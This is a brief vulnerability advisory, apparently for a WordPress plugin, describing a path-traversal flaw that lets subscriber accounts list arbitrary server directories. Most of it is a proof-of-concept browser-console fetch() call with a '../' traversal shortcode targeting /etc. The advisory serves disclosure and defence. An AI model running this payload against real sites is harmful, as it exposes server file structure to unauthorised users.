Description The plugin does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=parse-media-shortcode&shortcode=[MMFileList folder="../../../../../../../../../../etc" format="table" types"" headings=""]',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));